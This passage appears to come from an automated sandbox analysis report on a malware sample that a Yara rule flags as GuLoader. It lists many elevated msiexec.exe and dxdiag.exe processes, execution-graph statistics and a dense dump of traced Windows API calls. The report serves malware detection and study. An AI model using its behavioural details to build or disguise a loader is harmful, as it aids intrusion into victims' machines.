                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.23291877014.000000000C190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:08:46:22
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6bf8c0000
                                                      File size:875'008 bytes
                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:7
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:8
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:08:47:00
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:21
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:22
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:23
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:24
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:25
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:26
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:27
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:28
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:29
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:30
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:31
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:32
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:33
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:34
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                      Imagebase:0xfd0000
                                                      File size:59'904 bytes
                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:35
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:36
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:37
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:38
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:39
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:40
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:41
                                                      Start time:08:47:01
                                                      Start date:02/01/2025
                                                      Path:C:\Windows\SysWOW64\dxdiag.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                                                      Imagebase:0x3d0000
                                                      File size:222'720 bytes
                                                      MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                        Execution Graph

                                                        Execution Coverage:24.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:21.7%
                                                        Total number of Nodes:1276
                                                        Total number of Limit Nodes:37
402a1d 18 API calls 4263->4264 4265 401c90 IsWindow 4264->4265 4266 4019f3 4265->4266 3541 401f90 3542 401fa2 3541->3542 3552 402050 3541->3552 3543 402a3a 18 API calls 3542->3543 3545 401fa9 3543->3545 3544 401423 25 API calls 3548 4021c9 3544->3548 3546 402a3a 18 API calls 3545->3546 3547 401fb2 3546->3547 3549 401fc7 LoadLibraryExA 3547->3549 3550 401fba GetModuleHandleA 3547->3550 3551 401fd7 GetProcAddress 3549->3551 3549->3552 3550->3549 3550->3551 3553 402023 3551->3553 3554 401fe6 3551->3554 3552->3544 3555 40507c 25 API calls 3553->3555 3557 401ff6 3554->3557 3559 401423 3554->3559 3555->3557 3557->3548 3558 402044 FreeLibrary 3557->3558 3558->3548 3560 40507c 25 API calls 3559->3560 3561 401431 3560->3561 3561->3557 3562 402410 3563 402b44 19 API calls 3562->3563 3564 40241a 3563->3564 3565 402a3a 18 API calls 3564->3565 3566 402423 3565->3566 3567 40242d RegQueryValueExA 3566->3567 3570 4026a6 3566->3570 3568 402453 RegCloseKey 3567->3568 3569 40244d 3567->3569 3568->3570 3569->3568 3573 405dc1 wsprintfA 3569->3573 3573->3568 4267 401490 4268 40507c 25 API calls 4267->4268 4269 401497 4268->4269 4270 404191 4271 4041a7 4270->4271 4279 4042b3 4270->4279 4273 404048 19 API calls 4271->4273 4272 404322 4274 4043f6 4272->4274 4275 40432c GetDlgItem 4272->4275 4276 4041fd 4273->4276 4282 4040af 8 API calls 4274->4282 4277 404342 4275->4277 4278 4043b4 4275->4278 4281 404048 19 API calls 4276->4281 4277->4278 4285 404368 6 API calls 4277->4285 4278->4274 4286 4043c6 4278->4286 4279->4272 4279->4274 4280 4042f7 GetDlgItem SendMessageA 4279->4280 4301 40406a KiUserCallbackDispatcher 4280->4301 4284 40420a CheckDlgButton 4281->4284 4293 4043f1 4282->4293 4299 40406a KiUserCallbackDispatcher 4284->4299 4285->4278 4289 4043cc SendMessageA 4286->4289 4290 4043dd 4286->4290 4287 40431d 4291 40441b SendMessageA 4287->4291 4289->4290 4290->4293 4294 4043e3 SendMessageA 4290->4294 4291->4272 4292 404228 GetDlgItem 4300 40407d SendMessageA 4292->4300 4294->4293 4296 
40423e SendMessageA 4297 404265 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4296->4297 4298 40425c GetSysColor 4296->4298 4297->4293 4298->4297 4299->4292 4300->4296 4301->4287 4309 401595 4310 402a3a 18 API calls 4309->4310 4311 40159c SetFileAttributesA 4310->4311 4312 4015ae 4311->4312 4313 401717 4314 402a3a 18 API calls 4313->4314 4315 40171e SearchPathA 4314->4315 4316 401739 4315->4316 4317 402519 4318 40252e 4317->4318 4319 40251e 4317->4319 4321 402a3a 18 API calls 4318->4321 4320 402a1d 18 API calls 4319->4320 4322 402527 4320->4322 4323 402535 lstrlenA 4321->4323 4324 405b7d WriteFile 4322->4324 4325 402557 4322->4325 4323->4322 4324->4325 4326 402b9c 4327 402bdf SetDlgItemTextA 4326->4327 4328 402b9f 4326->4328 4329 402bf5 4327->4329 4328->4329 4330 402bfb MulDiv 4328->4330 4331 402bb5 wsprintfA SetWindowTextA 4330->4331 4331->4327 4333 40149d 4334 4014ab PostQuitMessage 4333->4334 4335 40226e 4333->4335 4334->4335 4336 4037a1 4337 4037ac 4336->4337 4338 4037b0 4337->4338 4339 4037b3 GlobalAlloc 4337->4339 4339->4338 4340 406ba1 4343 406332 4340->4343 4341 4063b3 GlobalFree 4342 4063bc GlobalAlloc 4341->4342 4342->4343 4344 406c9d 4342->4344 4343->4341 4343->4342 4343->4343 4343->4344 4345 406433 GlobalAlloc 4343->4345 4346 40642a GlobalFree 4343->4346 4345->4343 4345->4344 4346->4345 4347 401b23 4348 401b30 4347->4348 4349 401b74 4347->4349 4350 401bb8 4348->4350 4356 401b47 4348->4356 4351 401b78 4349->4351 4352 401b9d GlobalAlloc 4349->4352 4354 405e85 18 API calls 4350->4354 4358 40226e 4350->4358 4351->4358 4368 405e63 lstrcpynA 4351->4368 4353 405e85 18 API calls 4352->4353 4353->4350 4357 402268 4354->4357 4366 405e63 lstrcpynA 4356->4366 4361 405659 MessageBoxIndirectA 4357->4361 4359 401b8a GlobalFree 4359->4358 4361->4358 4362 401b56 4367 405e63 lstrcpynA 4362->4367 4364 401b65 4369 405e63 lstrcpynA 4364->4369 4366->4362 4367->4364 4368->4359 4369->4358 4370 401ca7 4371 402a1d 18 API calls 4370->4371 4372 401cae 4371->4372 
4373 402a1d 18 API calls 4372->4373 4374 401cb6 GetDlgItem 4373->4374 4375 402513 4374->4375 3172 40192a 3173 40192c 3172->3173 3174 402a3a 18 API calls 3173->3174 3175 401931 3174->3175 3178 405705 3175->3178 3215 4059c3 3178->3215 3181 405744 3183 405872 3181->3183 3229 405e63 lstrcpynA 3181->3229 3182 40572d DeleteFileA 3211 40193a 3182->3211 3183->3211 3247 406167 FindFirstFileA 3183->3247 3185 40576a 3186 405770 lstrcatA 3185->3186 3187 40577d 3185->3187 3189 405783 3186->3189 3230 40591c lstrlenA 3187->3230 3192 405791 lstrcatA 3189->3192 3193 40579c lstrlenA FindFirstFileA 3189->3193 3192->3193 3193->3183 3202 4057c0 3193->3202 3196 405900 CharNextA 3196->3202 3197 4056bd 5 API calls 3198 4058ac 3197->3198 3199 4058b0 3198->3199 3200 4058c6 3198->3200 3206 40507c 25 API calls 3199->3206 3199->3211 3204 40507c 25 API calls 3200->3204 3201 405851 FindNextFileA 3201->3202 3205 405869 FindClose 3201->3205 3202->3196 3202->3201 3210 405705 62 API calls 3202->3210 3212 40507c 25 API calls 3202->3212 3213 40507c 25 API calls 3202->3213 3234 405e63 lstrcpynA 3202->3234 3235 4056bd 3202->3235 3243 405d1e MoveFileExA 3202->3243 3204->3211 3205->3183 3207 4058bd 3206->3207 3208 405d1e 38 API calls 3207->3208 3208->3211 3210->3202 3212->3201 3213->3202 3253 405e63 lstrcpynA 3215->3253 3217 4059d4 3254 40596e CharNextA CharNextA 3217->3254 3220 405725 3220->3181 3220->3182 3221 4060ce 5 API calls 3224 4059ea 3221->3224 3222 405a15 lstrlenA 3223 405a20 3222->3223 3222->3224 3225 4058d5 3 API calls 3223->3225 3224->3220 3224->3222 3226 406167 2 API calls 3224->3226 3228 40591c 2 API calls 3224->3228 3227 405a25 GetFileAttributesA 3225->3227 3226->3224 3227->3220 3228->3222 3229->3185 3231 405929 3230->3231 3232 40593a 3231->3232 3233 40592e CharPrevA 3231->3233 3232->3189 3233->3231 3233->3232 3234->3202 3260 405ab1 GetFileAttributesA 3235->3260 3238 4056e0 DeleteFileA 3240 4056e6 3238->3240 3239 4056d8 RemoveDirectoryA 3239->3240 3241 4056ea 3240->3241 3242 4056f6 
SetFileAttributesA 3240->3242 3241->3202 3242->3241 3244 405d3f 3243->3244 3245 405d32 3243->3245 3244->3202 3263 405bac lstrcpyA 3245->3263 3248 405896 3247->3248 3249 40617d FindClose 3247->3249 3248->3211 3250 4058d5 lstrlenA CharPrevA 3248->3250 3249->3248 3251 4058a0 3250->3251 3252 4058ef lstrcatA 3250->3252 3251->3197 3252->3251 3253->3217 3255 405989 3254->3255 3257 405999 3254->3257 3256 405994 CharNextA 3255->3256 3255->3257 3259 4059b9 3256->3259 3258 405900 CharNextA 3257->3258 3257->3259 3258->3257 3259->3220 3259->3221 3261 4056c9 3260->3261 3262 405ac3 SetFileAttributesA 3260->3262 3261->3238 3261->3239 3261->3241 3262->3261 3264 405bd4 3263->3264 3265 405bfa GetShortPathNameA 3263->3265 3290 405ad6 GetFileAttributesA CreateFileA 3264->3290 3267 405d19 3265->3267 3268 405c0f 3265->3268 3267->3244 3268->3267 3270 405c17 wsprintfA 3268->3270 3269 405bde CloseHandle GetShortPathNameA 3269->3267 3271 405bf2 3269->3271 3272 405e85 18 API calls 3270->3272 3271->3265 3271->3267 3273 405c3f 3272->3273 3291 405ad6 GetFileAttributesA CreateFileA 3273->3291 3275 405c4c 3275->3267 3276 405c5b GetFileSize GlobalAlloc 3275->3276 3277 405d12 CloseHandle 3276->3277 3278 405c7d 3276->3278 3277->3267 3279 405b4e ReadFile 3278->3279 3280 405c85 3279->3280 3280->3277 3292 405a3b lstrlenA 3280->3292 3283 405cb0 3286 405a3b 4 API calls 3283->3286 3284 405c9c lstrcpyA 3285 405cbe 3284->3285 3287 405cf5 SetFilePointer 3285->3287 3286->3285 3288 405b7d WriteFile 3287->3288 3289 405d0b GlobalFree 3288->3289 3289->3277 3290->3269 3291->3275 3293 405a7c lstrlenA 3292->3293 3294 405a55 lstrcmpiA 3293->3294 3296 405a84 3293->3296 3295 405a73 CharNextA 3294->3295 3294->3296 3295->3293 3296->3283 3296->3284 4376 4028aa SendMessageA 4377 4028c4 InvalidateRect 4376->4377 4378 4028cf 4376->4378 4377->4378 3297 40322b SetErrorMode GetVersion 3298 403262 3297->3298 3299 403268 3297->3299 3300 4061fc 5 API calls 3298->3300 3301 40618e 3 API calls 3299->3301 3300->3299 3302 40327e 
